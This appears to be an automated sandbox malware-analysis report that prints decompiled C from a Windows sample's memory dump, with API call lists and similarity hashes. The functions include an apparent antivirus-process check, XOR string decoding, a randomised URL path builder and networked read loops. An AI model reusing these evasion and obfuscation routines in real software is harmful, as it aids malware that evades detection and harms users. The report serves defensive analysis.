                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x47fd134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x47fd164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E047FA71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x47fd134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E047F5646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E047FA734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E047F70CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E047F5646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E047F9242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 047F18EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 047F1907
                                                          • ResetEvent.KERNEL32(?), ref: 047F1980
                                                          • GetLastError.KERNEL32 ref: 047F199B
                                                            • Part of subcall function 047F9242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 047F9259
                                                            • Part of subcall function 047F9242: SetEvent.KERNEL32(?), ref: 047F9269
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 6457c2a6ec1f1da5a37556f7d5b96818af1183ca405f0ce21bc1074ae1a0302e
                                                          • Instruction ID: a5dfa931815500e0ca9a493ca173df66df8d4edc8915ddd10068d78179bb3c25
                                                          • Opcode Fuzzy Hash: 6457c2a6ec1f1da5a37556f7d5b96818af1183ca405f0ce21bc1074ae1a0302e
                                                          • Instruction Fuzzy Hash: F441CF32600644EBDB22DFA5CC48AAEB3B9EF84364F514528E752D7790EA70FD019B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 047F3B0D
                                                          • SysAllocString.OLEAUT32(047F85ED), ref: 047F3B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3B73
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f674e119d7b3afe6229d2e6610a623f5dc1c97a87c4b4edbdc6a2ad1b53b57fb
                                                          • Instruction ID: 9387626b2797ae5aa1a3366ab69750d61898fe499ca71193be063cb8c27da37a
                                                          • Opcode Fuzzy Hash: f674e119d7b3afe6229d2e6610a623f5dc1c97a87c4b4edbdc6a2ad1b53b57fb
                                                          • Instruction Fuzzy Hash: 3F310C71910209EFCB05DF99D8D48EE7BB9FF48310B10842EFA0697350D734AA81CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E047F11EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x47fd270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t3 = _t8 + 0x47fe87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E047F38A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x47fd2ac, 1, 0, _t30);
                                                          					E047FA734(_t30);
                                                          				}
                                                          				_t12 =  *0x47fd25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047FA65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E047F8EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x47fd10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E047FA273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 047F38A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,052E9A98,00000000,?,?,63699BC3,00000005,047FD00C,?,?,047F5D30), ref: 047F38DE
                                                            • Part of subcall function 047F38A8: lstrcpy.KERNEL32(00000000,00000000), ref: 047F3902
                                                            • Part of subcall function 047F38A8: lstrcat.KERNEL32(00000000,00000000), ref: 047F390A
                                                          • CreateEventA.KERNEL32(047FD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?), ref: 047F122F
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,047F3760,00000000,00000000,?,00000000,?,047F3760,?,00000001,?,?,?,?,047F52AA), ref: 047F128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?), ref: 047F12BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,047F3760,?,00000001,?,?,?,?,047F52AA), ref: 047F12D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: ba7eaa3d458c094f4a06406a8b63f9019f9742770f361b38ed3e53e3d477832b
                                                          • Instruction ID: cc3ca637bd09251038239938b6f8cb5360063fd1598576bcc8e5dabc3bfdaafd
                                                          • Opcode Fuzzy Hash: ba7eaa3d458c094f4a06406a8b63f9019f9742770f361b38ed3e53e3d477832b
                                                          • Instruction Fuzzy Hash: 0521D232700314DBDB315AE88E48EAF73A9FB89B20F954625FF06DB300DB65EC018694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E047F9242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x47fd13c; // 0x47fabf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E047FA71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E047FA734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E047F5646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 047F9259
                                                          • SetEvent.KERNEL32(?), ref: 047F9269
                                                          • GetLastError.KERNEL32 ref: 047F92F2
                                                            • Part of subcall function 047F5646: WaitForMultipleObjects.KERNEL32(00000002,047FA8E3,00000000,047FA8E3,?,?,?,047FA8E3,0000EA60), ref: 047F5661
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • GetLastError.KERNEL32(00000000), ref: 047F9327
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 3ec1666e613f186e8d251c142850d1eaa2266cffd9d5680aa2245a22ace9c341
                                                          • Instruction ID: 297af8b1edbbd443ce5ba637561e9adc96b035a03b559d9fe62b403a29a0b48c
                                                          • Opcode Fuzzy Hash: 3ec1666e613f186e8d251c142850d1eaa2266cffd9d5680aa2245a22ace9c341
                                                          • Instruction Fuzzy Hash: 4A31CBF5900309EFDB21DFA5CD84E9EB7B8EF08304F10896AE742E2351D775AA459B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E047F36B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E047F3BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E047F4F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E047FA2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x47fd2ac, 1, 0,  *0x47fd344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E047FA446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E047F853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E047F4F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E047F11EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(047FD2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,047F52AA,?,00000001,?), ref: 047F3702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F3721
                                                            • Part of subcall function 047FA446: WaitForSingleObject.KERNEL32(00000000,?,?,?,047F3741,?,047F3741,?,?,?,?,?,047F3741,?), ref: 047FA520
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: a8a8b9535bee5d0395750fb1bbd972faca61e0214641444a3fe22b04688d8af1
                                                          • Instruction ID: db0933abbcda924ab8d8a59bc18421c1f1bb8488f4beea3262012b321c04e462
                                                          • Opcode Fuzzy Hash: a8a8b9535bee5d0395750fb1bbd972faca61e0214641444a3fe22b04688d8af1
                                                          • Instruction Fuzzy Hash: 392165B2900259EBDB11BFE9CDC88EEB7ADEB44354B058425EF15A7300D734B9458BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E047F17E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x47fd238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x47fd250; // 0xa7e8b4ee
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x47fd250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}


















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047F1C49,00000000,?,?,047F20C2,?,052E95B0), ref: 047F17F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047F1808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,047F1C49,00000000,?,?,047F20C2,?,052E95B0), ref: 047F184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 047F186D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 8f2b4ec20c01af766237d4bf7bb0e9f1bde90ec52f33e95b16ff72a9b3412925
                                                          • Instruction ID: b0725c4533f5c9cb1028b9b367f73ea45a21089013676e7a69914a48973f1c47
                                                          • Opcode Fuzzy Hash: 8f2b4ec20c01af766237d4bf7bb0e9f1bde90ec52f33e95b16ff72a9b3412925
                                                          • Instruction Fuzzy Hash: A311C672A00114AFE7108BA9DE88E9EBBAAEB84260F454176F605DB350E7749E0597A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E047F486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E047FA71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x47fc284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x47fc284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,052E95AC,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F4889
                                                          • StrTrimA.SHLWAPI(?,047FC284,00000002,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48B3
                                                          • StrTrimA.SHLWAPI(00000001,047FC284,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: 7bf8c614952035ff378c02fb2f68c36cd306cef076bca20e40060d87e86492ed
                                                          • Instruction ID: a93f216d46a4df50e3c135fc5822ff5e44081e9a23c0d4e98afa33bb91804446
                                                          • Opcode Fuzzy Hash: 7bf8c614952035ff378c02fb2f68c36cd306cef076bca20e40060d87e86492ed
                                                          • Instruction Fuzzy Hash: 83012871601365AFD2319F698C4CE2BBB9CFB55A60F510519FA42C7340EB64E80196B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E047FA65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t2 = _t9 + 0x47fee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x47fd0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047FA66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 047FA67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 047FA6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 047FA6BA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 800e1d977af85317340a24301c2fc2362f675565ff3a2f43c21e28256ab8b5f5
                                                          • Instruction ID: 196612f3ae41ba485fccb8bad7dc20740152359660f4be6180f4dca724b7c968
                                                          • Opcode Fuzzy Hash: 800e1d977af85317340a24301c2fc2362f675565ff3a2f43c21e28256ab8b5f5
                                                          • Instruction Fuzzy Hash: 1FF0B436201124ABE721FABA9C4CDEB77ACEBC5755F014161EB09D3300EA24FE4986A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F6840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 047F684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 047F6863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 047F6870
                                                          • CloseHandle.KERNEL32(?), ref: 047F6882
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: aff55e964845c7660d28dc52922bb2547b3814d710ef77c2359d3cc72c3601bc
